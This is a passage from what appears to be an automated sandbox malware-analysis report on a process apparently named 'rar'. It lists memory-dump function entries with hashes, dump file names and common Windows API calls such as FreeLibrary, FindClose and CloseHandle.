                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79F0D013A8924265FB7C7A615C49277B9815F84760F880634E92D452C2DFDDE441D13C
                                                                                                                                                                                                                                            Function 00007FF702C338A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                            • Instruction ID: ac2ece301d3c817a0e972f17b045f2a273fcb18342671b7699cb5094b5c6a6aa
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6E04F52F1D342A1EF6D36222C5107B8A401F56B81E94687ACC1E47382DE5DA455D761
                                                                                                                                                                                                                                            Function 00007FF702C6FA10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3664257935-0
                                                                                                                                                                                                                                            • Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                                            • Instruction ID: ac94f3a686067c1b22c44f26798da5bf9a9774477ae9b276d2e38fc36f7ca8d1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90D09E6BE2AD86A6F784FB41EC4D7329A617F5479DFC90A34C41D055A1CFED2054C320
                                                                                                                                                                                                                                            Function 00007FF702C24538 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindClose.KERNELBASE(00000000,?,00000000,?,00007FF702C47A8C), ref: 00007FF702C24549
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseFind
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1863332320-0
                                                                                                                                                                                                                                            • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                                            • Instruction ID: 8aa6c870c943bdd95cc46a794d15fb2470322a6298ed381b1e5afdac081967ca
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AAC08C32E0188181C608B7298C450241510BF44735FD00330C13E051E08F9800AB8310
                                                                                                                                                                                                                                            Function 00007FF702C21930 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                            • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                                            • Instruction ID: ae2373483ae2627ae97b4475ee6a2049464c458dae13b62cdad238a91dba5278
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1F0A423A0868265FB24BB64E840376AA50DF00B78F9D5331D63D151D9CFE8D996C760